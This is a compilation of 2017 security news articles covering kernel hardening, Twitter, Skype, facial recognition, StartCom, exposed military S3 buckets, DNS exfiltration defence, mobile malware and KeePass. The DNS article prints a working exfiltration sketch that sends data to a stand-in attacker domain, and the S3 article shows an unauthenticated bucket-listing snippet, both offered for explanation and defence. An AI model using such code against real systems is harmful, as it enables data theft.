
Some ‘security people are f*cking morons’ says Linus Torvalds

Linux overlord Linus Torvalds has offered some very choice words about differing approaches to security, during a discussion about whitelisting features proposed for version 4.15 of the Linux kernel.

Torvalds’ ire was directed at open-source software aficionado and Google Pixel security team member Kees Cook, whom he has previously accused of idiocy.

Cook earned this round of shoutiness after he posted a request to “Please pull these hardened usercopy changes for v4.15-rc1.”


“This significantly narrows the areas of memory that can be copied to/from userspace in the face of usercopy bugs by adding explicit whitelisting for slab cache regions,” he explained. “This has lived in -next for quite some time without major problems, but there were some late-discovered missing whitelists, so a fallback mode was added just to make sure we don’t break anything. I expect to remove the fallback mode in a release or two.”

Torvalds’ response expressed doubts that Cook’s contribution would be useful or had been well tested. He therefore said: “This merge window is not going to be one where I can take a leisurely look at something like this.”

KVM maintainer Paolo Bonzini weighed in next with support for Cook, and urged Torvalds to “please do pull a subset, even after -rc1”.

Cook offered further explanation about his code, including “This is why I introduced the fallback mode: with both kvm and sctp (ipv6) not noticed until late in the development cycle, I became much less satisfied it had gotten sufficient testing.”

Torvalds then exploded.

“So honestly, this is the kind of completely unacceptable ‘security person’ behavior that we had with the original user access hardening too, and made that much more painful than it ever should have been,” he opened.

“IT IS NOT ACCEPTABLE when security people set magical new rules, and then make the kernel panic when those new rules are violated.”

That was just Torvalds warming up, as next came “That is pure and utter bullshit. We’ve had more than a quarter century _without_ those rules, you don’t then suddenly walz [sic] in and say ‘oh, everbody [sic] must do this, and if you haven’t, we will kill the kernel’.”

“The fact that you ‘introduced the fallback mode’ late in that series just shows HOW INCREDIBLY BROKEN the series started out.”

Torvalds’ post explained his attitude to security, namely that “security problems are just bugs” rather than opportunities to change the way the kernel behaves.

“The important part about ‘just bugs’ is that you need to understand that the patches you then introduce for things like hardening are primarly [sic] for DEBUGGING.”

“I’m not at all interested in killing processes. The only process I’m interested in is the _development_ process, where we find bugs and fix them.”

“As long as you see your hardening efforts primarily as a ‘let me kill the machine/process on bad behavior’, I will stop taking those shit patches.”

“Some security people have scoffed at me when I say that security problems are primarily ‘just bugs’.”

“Those security people are f*cking morons.”

He added that “I think the hardening project needs to really take a good look at itself in the mirror” and abandon a “kill on sight, ask questions later” mentality in favour of the following approach:

Let’s warn about what looks dangerous, and maybe in a _year_ when we’ve warned for a long time, and we are confident that we’ve actually caught all the normal cases, _then_ we can start taking more drastic measures

Torvalds has long been unafraid to express himself in whatever language he chooses on the kernel mailing list, and has earned criticism for allowing it to become a toxic workplace. He’s shrugged off those accusations with the argument that his strong language is not personal, as he is defending Linux rather than criticising individuals.

On this occasion his strong language is directed at a team and Cook’s approach to security, rather than directly at Cook himself. It’s still a nasty lot of language to have directed at anyone.

Cook has copped it in style, having posted that “I think my main flaw in helping bring these defenses to the kernel has been thinking they can be fully tested during a single development cycle, and this mistake was made quite clear this cycle, which is why I adjusted the series like I did.”

He concluded by saying “I’d like to think I did learn something, since I fixed up this series _before_ you yelled at me. :)”

“I’ll make further adjustments and try again for v4.16.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/20/security_people_are_morons_says_linus_torvalds/

Twitter gets tough on white supremacists with new policy

Endorsements for white supremacists Richard Spencer and Charlottesville “Unite The Right” protest creator Jason Kessler?

Umm, no: just because we verified that they are who they say they are doesn’t mean we like what they’re putting out there, or that they’re following community standards, @TwitterSupport said in a string of tweets on Wednesday… and then revoked those verified badges and banned some accounts.

As The Daily Beast reports, it turns out that Twitter had actually changed its policy on the verified badges last week.

According to the new policy, users can now lose the blue verified badge for “inciting or engaging in harassment of others,” “promoting hate and/or violence against, or directly attacking or threatening other people on the basis of race, ethnicity, national origin, sexual orientation, gender, gender identity, religious affiliation, age, disability, or disease,” supporting people who promote those ideas, and other reasons.

The new policy came a day after the Daily Beast ran a story about how Kessler – who had called the death of anti-racist protester Heather Heyer in Charlottesville “payback time” – had been verified by Twitter.

Sorry, CEO Jack Dorsey wrote last Thursday; we should have done this sooner.

Twitter on Wednesday claimed responsibility for failing to clear up users’ misperception of what the verified badge is all about:

Verification has long been perceived as an endorsement. We gave verified accounts visual prominence on the service which deepened this perception. We should have addressed this earlier but did not prioritize the work as we should have.

Kessler, Spencer and other far-right conservatives are not pleased.

The banned @BakedAlaska account Kessler referred to is that of Tim Gionet, a far-right former BuzzFeed employee. In his final tweets, Gionet urged his followers to push for the reinstatement of an account that was banned from Twitter for, he claimed, “saying muslim immigrants are adding to the rape culture.”

They may be who they say they are, but being verified doesn’t exempt you from complying with Twitter’s community policies, the company says. When the Daily Beast contacted Twitter about Gionet’s suspension, a spokesperson pointed to the company’s hateful conduct policy. Specifically, there’s a section that bans “repeated and/or non-consensual slurs, epithets, racist and sexist tropes, or other content that degrades someone.”

Mind you, this isn’t the first time that Twitter has stripped the badge for what it sees as egregious content: far-right writer Milo Yiannopoulos lost his and was permanently banned when Twitter cracked down on a wave of racist abuse targeting the Saturday Night Live comedian and “Ghostbusters” actor Leslie Jones.

Twitter first introduced the verified checkmark – a little blue badge with a white tick in the center – to denote “that an account of public interest is authentic,” as opposed to, say, all the fake celebrity accounts that have duped individuals, newspapers as big as the New York Times, and politicians.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/d0SyoVzlH5Y/

Skype faces fine after refusing to allow eavesdropping

Skype’s looking at a €30,000 ($35,000) fine from a Belgian court that wants to eavesdrop on conversations – something that Microsoft-owned Skype said is 1) technically impossible and 2) shouldn’t apply because the laws are for telecoms, which it isn’t.

Skype lost an appeal of the fine in a Belgian court on Wednesday.

According to the Dutch-language Belgian newspaper Het Belang van Limburg, the trouble began in 2012, when Belgian authorities came knocking, wanting to listen in on conversations that an organized crime gang conducted mostly on Skype.

According to public prosecutor Tim Van hoogenbemt, Skype only complied with part of the request. In other words, it only handed over metadata: e-mail addresses, user histories, account details and IP addresses. But when it came to the content of conversations, Skype said it was “technically impossible” to listen in, the prosecutor said.

Belgian law stipulates that telecoms have to hand over certain calls to investigators at the court’s behest. Skype knows that full well, Van hoogenbemt said. His office emphasized that the calls took place in Belgium, involved Belgian speakers, and that of course Belgian laws apply.

Skype offers services in our country, so it has to know the legislation. And therefore also know that the court can request eavesdropping measures. They had to provide the equipment for doing something like that.

Besides the argument that eavesdropping on conversations is technically impossible, Skype claims it’s neither an operator nor a service provider, but only a provider of certain software. According to Reuters, Skype also argued that Luxembourg, where Skype and its servers are based, could block any eavesdropping arrangement set up to monitor Belgium-originated calls.

On Wednesday, the court didn’t buy any of it. The judgement, handed down by a court in the city of Mechelen in the Belgian province of Antwerp, Flanders, said that Skype was “indisputably” a telecoms operator and that references in Belgian law to “telecommunication” included “electronic communication”.

This certainly isn’t Microsoft’s first skirmish over law enforcement that wants to pry open private communications. The case is reminiscent of Microsoft’s fight with the US over emails stored on servers based in Ireland. At this point, US v. Microsoft is headed to the Supreme Court.

However the Supreme Court rules, it will have massive implications for US-based communications companies that serve countries all over the world.

The Supreme Court will hear the case sometime next year.

As far as Skype’s troubles in Belgium go, Reuters reports that Microsoft isn’t giving in just yet: it’s considering further legal options.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/Q8mSlbBGlZI/

For goodness sake, stop the plod using facial recog, London mayor told

London’s Metropolitan Police force’s use of “intrusive” technologies “without proper regulation” could put a fundamental principle of policing at risk, the London mayor has been told.

In a letter (PDF) to Sadiq Khan, the Greater London Assembly – the group elected to hold the mayor to account – expressed “significant concerns” about facial recognition technology.

The Met has used it at the two most recent Notting Hill Carnivals, but while it claims this is a trial, it is keeping schtum on the details – even in the face of reports it led to 35 false matches and one wrongful arrest this year.

“This is a hugely controversial topic and it is extremely disappointing that trials have been conducted at the Notting Hill Carnival with so little public engagement,” said GLA oversight committee chairman Len Duvall in the letter.

Khan and the Mayor’s Office for Policing And Crime (MOPAC) have a responsibility to push the Met to improve engagement and transparency, he said.

Duvall added that it was particularly concerning that the trial was going ahead despite the lack of a national strategy on biometrics, which was originally promised by the government in 2012 but has been repeatedly delayed.

“The Met is trialling this technology in the absence of a legislative framework and proper regulation or oversight,” Duvall said.

“The concept of policing by consent is potentially at risk if the Met deploys such intrusive technology without proper debate and in the absence of any clear legal guidelines.”

He said the committee felt there was “a strong case” for Khan to “instruct the Met to stop trials” until either MOPAC establishes an internal framework or a national one is developed and consulted on.

The GLA also gave short shrift to the Met’s attempts to alert the public to its work, saying there was “no indication” it planned to publish any results.

It added: “Simply putting out press releases is not enough: the Met must engage with the public and with stakeholders in a much more meaningful way before going any further.”

The group’s calls echo those made by the UK Biometrics Commissioner Paul Wiles, who has also called into question the police’s use and retention of biometric images.

The GLA referred to this in its letter, criticising the fact there is “no simple way” for people to find out how long their personal data is held by organisations in the capital.

For instance, the Met keeps automatic number plate recognition data for two years, but Transport for London keeps the same data for 28 days. And images from the force’s body-worn cameras are kept for 31 days, while TfL retains Oyster journey data for eight weeks.

“This is a very confusing picture and we ask you to consider how the GLA Group can make it easier for the public to find out how long their personal data is retained,” Duvall said.

Elsewhere in his letter, Duvall warned the mayor that TfL’s plans to use Wi-Fi connection data to sell advertising risk leaving customers feeling like they “have been taken advantage of”.

He said TfL should have made this clearer, and urged it to address the issue when data collection is rolled out across the Tube network.

The Home Office didn’t respond on the record. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/17/put_police_use_facial_recog_on_ice_london_mayor_told/

Shamed TLS/SSL cert authority StartCom to shut up shop

Controversial certificate authority StartCom is going out of business.

StartCom board chairman Xiaosheng Tan told The Register the business will close its doors on January 1, 2018, at which point new certificates will no longer be issued.

CRL and OCSP services will continue for two years from then, at which point StartCom’s three root key pairs will be terminated.

StartCom and WoSign certificates have been put on untrusted lists by the big browser makers, including Mozilla, Apple, Google and Microsoft.

Tan said the closure “would not have a major impact” because “the major browsers” already don’t trust StartCom certificates, and the two-year wind-down should “limit” any disturbance to certificate owners.

He was unable to provide an estimate of the number of websites that currently use StartCom certificates, but said they are global.

According to w3techs.com, about 0.1 per cent of all websites use StartCom as an SSL certificate authority.

The Register had, er, some difficulty accessing StartCom’s website due to a certificate warning from some of the web browsers we tried. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/17/battered_certificate_authority_startcom_shutters_the_doors/

Massive US military social media spying archive left wide open in AWS S3 buckets

Three misconfigured AWS S3 buckets have been discovered wide open on the public internet containing “dozens of terabytes” of social media posts and similar pages – all scraped from around the world by the US military to identify and profile persons of interest.

The archives were found by veteran security breach hunter UpGuard’s Chris Vickery during a routine scan of open Amazon-hosted data silos, and these ones weren’t exactly hidden. The buckets were named centcom-backup, centcom-archive, and pacom-archive.

CENTCOM is the common abbreviation for the US Central Command, which runs US military operations in the Middle East, North Africa and Central Asia. PACOM is the name for US Pacific Command, covering the rest of southern Asia, China and Australasia.

Vickery told The Register today he stumbled upon them by accident while running a scan for the word “COM” in publicly accessible S3 buckets. After refining his search, the CENTCOM archive popped up, and at first he thought it was related to Chinese multinational Tencent, but quickly realized it was a US military archive of astounding size.

“For the research I downloaded 400GB of samples but there were many terabytes of data up there,” he said. “It’s mainly compressed text files that can expand out by a factor of ten so there’s dozens and dozens of terabytes out there and that’s a conservative estimate.”
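To make “publicly accessible” concrete, here is a minimal sketch – not Vickery’s actual tooling – of the kind of unauthenticated check anyone can run against a bucket name, using boto3’s unsigned-request mode. The bucket name below is a placeholder.

    # Hypothetical illustration: list a few objects from an S3 bucket using no
    # AWS credentials at all. If this succeeds, the bucket is world-readable.
    import boto3
    from botocore import UNSIGNED
    from botocore.config import Config
    from botocore.exceptions import ClientError

    s3 = boto3.client("s3", config=Config(signature_version=UNSIGNED))

    def list_public_bucket(bucket_name, max_keys=20):
        try:
            resp = s3.list_objects_v2(Bucket=bucket_name, MaxKeys=max_keys)
        except ClientError as err:
            print(f"{bucket_name}: not publicly listable ({err.response['Error']['Code']})")
            return []
        return [obj["Key"] for obj in resp.get("Contents", [])]

    for key in list_public_bucket("example-open-bucket"):   # placeholder name
        print(key)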


Just one of the buckets contained 1.8 billion social media posts automatically fetched over the past eight years. The collection mainly contains postings made in Central Asia, although Vickery noted that some of the material is taken from comments made by American citizens.

The databases also reveal some interesting clues as to what this information is being used for. Documents make reference to the fact that the archive was collected as part of the US government’s Outpost program, which is a social media monitoring and influencing campaign designed to target overseas youths and steer them away from terrorism.

Vickery found the Outpost development configuration files in the archive, as well as Apache Lucene indexes of keywords designed to be used with the open-source search engine Elasticsearch. Another file refers to Coral, which may well be a reference to the US military’s Coral Reef data-mining program.

“Coral Reef is a way to analyze a major data source to provide the analyst the ability to mine significant amounts of data and provide suggestive associations between individuals to build out that social network,” Mark Kitz, technical director for the Army Distributed Common Ground System – Army, told the Armed Forces Communications and Electronics Association magazine Signal back in 2012.

“Previously, we would mine through those intelligence reports or whatever data would be available, and that would be very manual-intensive.”

Before you start scrabbling for your tinfoil hats, the army hasn’t made a secret of Coral Reef, even broadcasting the awards the software has won. And social media monitoring isn’t anything new, either.

However, it is disturbing quite how easy this material was to find, how poorly configured it was, and that the archives weren’t even given innocuous names. If America’s enemies – or to be honest, anyone at all – are looking for intelligence, these buckets were a free source of information to mine.

After years of security cockups like this in the public and private sectors, Amazon has tried to help its customers avoid configuring their S3 buckets as publicly accessible stores, by adding full folder encryption, yellow warning lights when buckets aren’t locked down, and tighter access controls.

“This was found before these new Amazon controls were added,” Vickery said. “So we have yet to see how effective that yellow button will be.”
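On the defender’s side, the most basic checks don’t require exotic tooling either. Here is a minimal sketch, assuming boto3 and credentials for the account that owns the bucket, of testing whether a bucket’s ACL grants access to everyone (bucket policies are a separate, equally important check); the bucket name is a placeholder.

    # Hypothetical illustration: flag a bucket whose ACL grants access to the
    # AllUsers or AuthenticatedUsers groups, i.e. to effectively everyone.
    import boto3

    PUBLIC_GROUPS = {
        "http://acs.amazonaws.com/groups/global/AllUsers",
        "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
    }

    s3 = boto3.client("s3")

    def bucket_is_public_by_acl(bucket_name):
        acl = s3.get_bucket_acl(Bucket=bucket_name)
        return any(
            grant.get("Grantee", {}).get("Type") == "Group"
            and grant["Grantee"].get("URI") in PUBLIC_GROUPS
            for grant in acl["Grants"]
        )

    print(bucket_is_public_by_acl("my-company-backups"))   # placeholder name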

Vickery said he notified the American military about the screwup, and the buckets have now been locked down and hidden. Unusually, the military contact thanked him for bringing the matter to their attention – usually talking to the armed forces is a “one-way street,” Vickery said.

The Register asked the army for comment, and for more details on Outpost and Coral Reef, but wheels turn slowly in the Green Machine. We’ll update the story as soon as more information is known. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/17/us_military_spying_archive_exposed/

Tips to Protect the DNS from Data Exfiltration

If hackers break in via the Domain Name System, most businesses wouldn’t know until it’s too late. These tips can help you prepare.

The noise of IT staff scrambling to patch system vulnerabilities is a CISO’s worst fear — it’s the sign that someone somewhere could potentially infiltrate the network. The recent Equifax breach is a reminder that the loss of sensitive data has become too commonplace. Personal records, thought to be under lock and key, are being siphoned out of businesses, and most companies aren’t aware until it is too late. Yahoo, Target, Home Depot, and Anthem are a few of the notable recent victims. In July, hackers even seized the latest episodes of Game of Thrones from HBO.

The most insidious path for criminals to mine data is via the Domain Name System (DNS). The DNS protocol is manipulated to act as a “file transfer” protocol and by default is seen as legitimate. Most businesses don’t even know that data is being exfiltrated until it is too late.

A recent DNS threat report from EfficientIP revealed that 25% of organizations in the US experienced data exfiltration via DNS, and of those, 25% had customer information or intellectual property stolen. The average time to discover a breach was more than 140 days. Considering that hackers can silently drain about 18,000 credit card numbers per minute via DNS, that’s a customer database many times over. In addition, businesses aren’t installing the required patches on their DNS servers, either (86% applied only half of what is necessary, according to our report), which makes sense in the case of Equifax, where apparently only one employee was responsible for patches.

Sinister DNS data exfiltration will continue to occur unless businesses play a stronger offense. It’s a challenge for organizations to win the cybersecurity battle without a proactive strategy that addresses DNS. Here are three actions to protect the network:

1. Learn how data is exfiltrated via DNS. Commonly, hackers embed data in recursive DNS requests, leveraging any public authoritative nameserver, legitimate or not. A small piece of malware slices the data set into small chunks, which are then encoded and submitted as queries to a local DNS resolver. The resolver, tricked into not using its cache, forwards the requests to a compromised authoritative nameserver serving a domain controlled by the attacker, which receives all of the emitted queries. Once collected from the logs of that authoritative nameserver, the queries can be parsed to rebuild the original data set by decoding the labels in the correct order (such as username followed by password). A minimal sketch of this encoding pattern appears after this list.

DNS tunneling abuses the protocol in a similar manner, only it permits two-way communication that bypasses existing network security, allowing hackers to create easy-to-use backdoors. It is less discreet, as it requires specific software to be executed on both the client and server sides, but it sets up an IP tunnel through DNS, allowing attackers to leverage known protocols such as SSH or HTTP so they can exfiltrate any data set from a network.

2. Examine, analyze, rinse, repeat. Teams need to monitor DNS traffic and be alerted when irregular requests and responses are moving in and out of the network. Filtering systems can check queried domains against a real-time blacklist and automatically determine whether a query is trustworthy or represents a risk.

Detection can be accomplished by analyzing payloads and traffic, blocking attacks without also blocking legitimate traffic. Payload analysis inspects a single request and its associated responses for tunnel indicators; it is resource intensive (which degrades DNS performance) and can generate a lot of false positives. DNS transaction inspection looks at multiple requests and responses over time and analyzes the amount, load, and frequency of those requests per client, permitting threat-behavior analysis while using fewer resources and generating fewer false positives. Traffic analysis provides historical data (number of hostnames per domain, location of requests, etc.) that can confirm whether exfiltration happened and can block access to malicious domains, but it is not real time, so it may come too late. A simple illustration of payload analysis appears after this list.

3. Create an event reaction checklist. If malicious activity is found on the DNS, companies must have a plan to stop and mitigate it. Three crucial components: first, perform general monitoring and traffic analysis; internal hosts or devices shouldn’t be able to use an external resolver and bypass network security. Second, analyze DNS payloads and network traffic on a per-client basis; this security needs to be implemented at the resolver level. Finally, perform a security assessment to prevent future occurrences, which includes separating authoritative servers from recursive servers and implementing a feed to block known malicious domains.
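Here is the minimal sketch promised in step 1 – purely illustrative Python, with a made-up collector domain; run as-is it just produces failed lookups, which is exactly why the technique is so easy to miss.

    # Illustrative only: slice a secret into chunks, encode each chunk as a DNS
    # label, and let ordinary lookups carry the data toward whichever nameserver
    # is authoritative for the (hypothetical) attacker-controlled domain.
    import base64
    import socket

    EXFIL_DOMAIN = "evil-collector.example"   # made-up attacker domain
    CHUNK = 30                                # keeps each label under 63 bytes

    def exfiltrate(secret: bytes):
        for i in range(0, len(secret), CHUNK):
            label = base64.b32encode(secret[i:i + CHUNK]).decode().rstrip("=").lower()
            qname = f"{label}.{i // CHUNK}.{EXFIL_DOMAIN}"   # sequence number preserves order
            try:
                socket.gethostbyname(qname)   # the query itself carries the data
            except socket.gaierror:
                pass                          # NXDOMAIN is expected; the data has already left

    exfiltrate(b"user=alice&password=hunter2")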
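The payload-analysis idea from step 2 can be illustrated just as simply: flag query names whose labels are unusually long or high in entropy, a common tunnelling tell. The thresholds and sample queries below are illustrative, not tuned values from the report.

    # Illustrative heuristic: long or high-entropy DNS labels often indicate
    # encoded data rather than human-chosen hostnames.
    import math
    from collections import Counter

    def shannon_entropy(s: str) -> float:
        counts = Counter(s)
        return -sum((c / len(s)) * math.log2(c / len(s)) for c in counts.values())

    def looks_like_tunnelling(qname: str, max_label=40, max_entropy=3.5) -> bool:
        # Naively drop the registered domain and TLD; real tools use a proper suffix list.
        labels = qname.rstrip(".").split(".")[:-2]
        return any(len(l) > max_label or shannon_entropy(l) > max_entropy
                   for l in labels if l)

    for q in ["www.example.com.",
              "nbswy3dpeb3w64tmmqqho33snrscc.17.evil-collector.example."]:
        print(q, "->", "suspicious" if looks_like_tunnelling(q) else "ok")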

DNS is a core foundation of the Internet, yet it is increasingly used in attacks to extract valuable data under the radar. Having a robust and layered defense is essential to avoid being the next target. IT departments must also rethink how the infrastructure is secured. Equifax admitted that a flaw wasn’t patched for weeks. On average, a company spends more than $2 million per year fixing damage caused by intrusions, including exfiltration, according to our report. With looming regulation (such as the EU’s GDPR) that will enforce penalties, the damage will be much higher for those that are breached. Proactive DNS monitoring is a step in the right direction to thwart hackers.


Hervé Dhélin is the VP of Strategy at EfficientIP, based out of France. He manages global marketing and strategy with a focus on North America and APAC, the two most important growing regions for EfficientIP. Hervé has more than 30 years of experience …

Article source: https://www.darkreading.com/risk/tips-to-protect-the-dns-from-data-exfiltration/a/d-id/1330411?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Mobile Malware Incidents Hit 100% of Businesses

Attempted malware infections against BYOD and corporate mobile devices are expected to continue to grow, new data shows.

Every business with BYOD and corporate mobile device users across the globe has been exposed to mobile malware, with an average of 54 attempts per company played out within a 12-month period, according to a Check Point report released today.

The study, based on data collected from Check Point SandBlast Mobile deployments at 850 organizations, is the latest sign of growth in mobile malware incidents.

“100% of businesses [facing an attempted attack] was not surprising because the statistics from a year or two ago started to show it was going this way,” says Michael Shaulov, head of Check Point’s product management for mobile and cloud security. “But the average of 54 [attempts] was surprising. I was expecting two, three, or four.”

The report also notes that 94% of security professionals anticipate that actual mobile malware attacks will continue to increase, with nearly 66% doubting they can prevent them.

“We’ve seen a steady parade of malware specimens over the last several years,” says James Plouffe, lead solutions architect at MobileIron. He notes that although the 100% mobile malware figure seems high at first blush, it is important to distinguish between organizations that have been exposed to malware and those that have actually been infected.

Patrick Hevesi, a Gartner analyst, anticipates a continued rise in mobile malware incidents and breaches. “There are billions of mobile devices for the attackers to try and gain access and some form of monetary gain,” he says. “I feel as more and more people continue to make phones and tablets their primary device, the attacks will continue to grow.”

Attack Drivers

Most of the malware that BYOD and corporate devices encounter comes from apps at third-party stores, Shaulov says.

Other forms of malicious activity against these devices are also taking place with great frequency. The report reveals 89% of organizations experienced at least one man-in-the-middle incident stemming from users connecting to a risky WiFi network. “Attackers are trying to get access to the data transmitted, rather than inject malware,” Shaulov says.

Phil Hochmuth, an IDC analyst, says BYOD devices are usually more susceptible to attack than corporate devices because they are not managed by such security measures as an enterprise mobility management platform or mobile threat management platform. These platforms can restrict some of the more liberal permissions and user settings on BYOD devices, he adds.

“We’ve seen mobile threats become more elaborate and go beyond malware or bad apps,” says Hochmuth. “They use a mix of network-based attacks, like spoofed WiFi, or malicious management profiles to steal data. Attacks on the core mobile OS kernel, iOS and Android, are also becoming more sophisticated.”

Mobile malware, for example, is also showing up pre-installed on some of the smartphone brands or embedded in apps in app stores like Google Play and Apple’s App Store.

And while the report notes 75% of organizations average 35 rooted or jailbroken devices on their networks, Shaulov does not attribute that to the high percentage of companies exposed to malware. “People with jailbroken or rooted devices are power users and these are the guys who know what they are doing and are less susceptible to attacks,” he says.

By industry, the Check Point report shows that the financial services industry encountered the most mobile malware incidents (39%), followed by government (26%).


Financial services devices also took the brunt of the various mobile malware types that surfaced, according to the report. Their devices accounted for:

  • 44% of all detected remote access Trojans (mRATs)
  • 40% of rogue ad networks that run in the background and click on ads
  • 32% of information stealers

But when it comes to premium dialers, government-issued phones and government employees’ BYOD devices were exposed to 43% of this type of malware. “Many of these premium dialers are related to phishing attacks and government employees, in particular, were more susceptible to phishing attacks,” Shaulov says.


Dawn Kawamoto is an Associate Editor for Dark Reading, where she covers cybersecurity news and trends. She is an award-winning journalist who has written and edited technology, management, leadership, career, finance, and innovation stories for such publications as CNET’s …

Article source: https://www.darkreading.com/mobile/mobile-malware-incidents-hit-100--of-businesses/d/d-id/1330453?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Businesses Can’t Tell Good Bots from Bad Bots: Report

Bots make up more than 75% of total traffic for some businesses, but one in three can’t distinguish legitimate bots from malicious ones.

One in three organizations can’t differentiate good or legitimate bots from bad bots – a shortcoming that can affect application security.

Bots make up more than 75% of total traffic for some businesses, according to a Radware study on Web application security. The study found nearly half (45%) of businesses had been hit with a data breach in the past year, and 68% are not confident they can keep corporate information safe.

Malicious bots are a serious risk, as Web-scraping attacks can affect retailers by stealing intellectual property, undercutting prices, and holding mass inventory in limbo, the report states. In retail, 40% of businesses can’t tell good bots from bad ones. The healthcare industry is also struggling: 42% of its traffic comes from bots, but only 20% of IT security execs can tell whether those bots are nefarious.

Researchers found gaps in DevOps security, which likely stem from the pressure to consistently deliver application services. Nearly half (49%) of respondents use continuous delivery of application services and 21% plan to adopt it in the next one to two years. More than half (62%) believe this increases the attack surface, and about half report that they don’t integrate security into continuous application delivery.




Article source: https://www.darkreading.com/application-security/businesses-cant-tell-good-bots-from-bad-bots-report/d/d-id/1330455?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

KeePass – a password manager that’s cloud-less (but complex)

It can get a bit overwhelming for the average person to understand all the security-related best practices they might hear about online or at work. This one is certainly worth harping on about though: credential reuse.

Using that same easy-to-type password on every website and service you use practically rolls out the red carpet for an attacker into your online life.

So if there’s one thing we suggest to everyone that will go a long way to improve their overall security, it’s using a password manager.

We’ve covered password managers in the past, and generally, our focus has been on some variant that stores your password data in the cloud, which means all that crucial data is on someone else’s computer.

Understandably, many Naked Security readers have balked at this entire idea – Why should my online security be at the mercy of a third party that may, or may not, secure my data as well as I’d like?

It’s a reasonable question – and there is an answer: KeePass.

The nitty gritty on KeePass

KeePass is an open-source password manager that does all the things you’d expect a password manager to do at the very least – it stores all your website and service credentials in a highly encrypted vault that can only be unlocked with one Master Password, which becomes the only password you need to remember.

But a key difference between KeePass and cloud-based password managers is that KeePass is software you run locally – not an online service – and your KeePass vault is something you store in a location of your choosing.

That can be on a hard drive, a portable USB key, or even a cloud service you subscribe to. It’s up to you where your password vault goes and who has access to it.

Keeping the password vault off the internet actually makes it highly portable. A version of KeePass can be downloaded and run directly without needing to formally install it anywhere (for example, from a USB key).

A great example of this would be a work-owned computer where you don’t have admin privileges to install any software on the core system. If you have a KeePass instance and your password vault on some kind of portable storage, you can take your passwords with you anywhere, regardless of whether you have internet access or not.

In an interesting twist, many KeePass users actually advocate storing a master copy of the password vault online somewhere as a backup and to make syncing and updating the vault across devices easier.

The reason this doesn’t raise any hackles for the Never-Cloud crowd is that they don’t have to play along. The KeePass vault file is itself encrypted, so if you do keep a backup in the cloud and your online storage is breached, the KeePass file is useless without the master password. (To be fair, this is also the argument many cloud-based password managers make about how they store user password vaults.)
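For readers comfortable with a bit of scripting, the “it’s just an encrypted file” point can be made concrete with the third-party pykeepass Python library (not part of KeePass itself). This is a minimal sketch; the file path, entry titles and master password are placeholders.

    # Hypothetical illustration using the pykeepass library (pip install pykeepass).
    from pykeepass import PyKeePass

    # The .kdbx file is just an encrypted blob; without the master password
    # (and optional key file) it is useless wherever it is stored or backed up.
    kp = PyKeePass("/media/usb/passwords.kdbx", password="correct horse battery staple")

    entry = kp.find_entries(title="Example Webmail", first=True)
    if entry:
        print(entry.username, entry.url)

    # Adding a credential and saving re-encrypts the whole database on disk.
    kp.add_entry(kp.root_group, title="New Service", username="alice", password="s3cr3t!")
    kp.save()

The same vault opens identically from a hard drive, a USB stick or a synced cloud folder – the protection travels with the file, not with where it lives.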

The beauty of open-source software like KeePass is in the numerous community-contributed extensions and plugins. For instance, there are a number of plugins that allow KeePass to integrate with your browser – auto-filling login forms or capturing credentials as they’re typed.

Other plugins bring interesting functionality to the table – one of my favorites cross-checks your saved credentials against those on Troy Hunt’s haveibeenpwned.com to let you know, well, if you’ve been pwned (if your credentials have been part of a major known data breach); the idea behind it is sketched below. But that’s just scratching the surface; truly, it’s plugins all the way down.
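The idea behind that pwned-check plugin can be sketched in a few lines against the public Pwned Passwords range API – this is a generic illustration, not the plugin’s own code. Thanks to the API’s k-anonymity design, only the first five characters of a SHA-1 hash ever leave your machine, never the password itself.

    # Illustrative check against https://api.pwnedpasswords.com (k-anonymity range API).
    import hashlib
    import urllib.request

    API = "https://api.pwnedpasswords.com/range/"

    def times_pwned(password: str) -> int:
        sha1 = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
        prefix, suffix = sha1[:5], sha1[5:]
        req = urllib.request.Request(API + prefix, headers={"User-Agent": "hibp-sketch"})
        with urllib.request.urlopen(req) as resp:
            for line in resp.read().decode().splitlines():
                candidate, _, count = line.partition(":")
                if candidate == suffix:
                    return int(count)
        return 0

    print(times_pwned("password1"))   # well-known breached passwords return large counts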

With great power comes great responsibility – and KeePass is quite complex by design. It has incredible capabilities, official and user-contributed, that give it a great deal of extensibility.

Just about every possible thing that someone might want in a password manager is in there, somewhere. For an easy example, the dialog for entering a new credential set is crowded with fields and options, including one to “collect additional entropy”.

One wonders what the average person thinks “collect additional entropy” means. To be honest I’m only vaguely familiar with it, though this support forum post cleared it up:

Basically every password generator has such an option, and some people would complain if KeePass wouldn’t have one. I don’t see much value in it though…

Ah, okay.
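For context on what a password generator is doing under the hood, here is a generic sketch – not KeePass’s own code – using Python’s secrets module. On a modern OS the kernel’s random source is already well seeded, which is broadly why the answer above sees little value in collecting extra entropy by hand.

    # Generic password generation from the operating system's CSPRNG.
    import math
    import secrets
    import string

    ALPHABET = string.ascii_letters + string.digits + string.punctuation

    def generate_password(length: int = 20) -> str:
        return "".join(secrets.choice(ALPHABET) for _ in range(length))

    print(generate_password())
    # Rough strength estimate: log2(alphabet size) bits per character.
    print(f"~{20 * math.log2(len(ALPHABET)):.0f} bits of entropy")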

Speaking of support forums, if you’re the type to tinker first and read documentation later, there are plenty of rabbit holes to go down. And yes, there are FAQs, help docs and support forums, but beyond the basics, a well-crafted online search is often what it takes to figure things out.

I suspect this may be a non-issue for most people reading this, but the kind of horsepower KeePass provides might not be appropriate for anyone who gets freaked out by complexity, or just needs a bit more hand-holding with technology in general – especially if they’re already struggling with the concept of password managers to begin with.

But for those of us who want the most amount of control over our passwords and how they’re stored, and are comfortable with the slightly higher barrier to entry than a consumer-grade cloud-centric password manager, KeePass makes a lot of sense.

We know from past articles that many of you are KeePass fans. If you have any favorite features, extensions or plugins, please share them with us in the comments below.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/4zSnoUC2K04/